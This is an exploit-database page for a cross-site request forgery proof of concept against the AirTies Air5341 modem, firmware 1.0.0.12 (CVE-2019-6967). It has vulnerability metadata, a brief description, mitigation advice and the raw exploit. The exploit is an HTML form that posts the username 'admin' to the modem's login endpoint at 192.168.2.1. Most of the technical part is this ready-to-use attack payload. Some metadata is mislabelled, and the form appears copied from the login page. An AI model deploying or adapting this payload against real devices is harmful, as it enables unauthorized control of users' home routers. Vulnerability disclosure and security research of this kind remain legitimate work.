AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC

vendor:

Air5341 Modem

by:

Ali Can Gönüllü

8.8

CVSS

HIGH

CSRF

352 (Cross-Site Request Forgery)

CWE

Product Name: Air5341 Modem

Affected Version From: AirTies Modem Firmware 1.0.0.12

Affected Version To: AirTies Modem Firmware 1.0.0.12

Patch Exists: NO

Related CWE: CVE-2019-6967

CPE: a:airties:air5341_firmware:1.0.0.12

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 x64

Unknown

AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC

This exploit allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks on AirTies Air5341 1.0.0.12 Modems. By tricking a user into clicking on a malicious link, the attacker can perform unauthorized actions on behalf of the user, such as changing the modem settings or stealing sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update the AirTies Modem Firmware to a version that includes a fix for this issue. Additionally, users should be cautious when clicking on links from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
       <input type="hidden" id="redirect" name="redirect">
       <input type="hidden" id="self" name="self">
       <input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
       <input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0pt  none">
      </form>
      </html>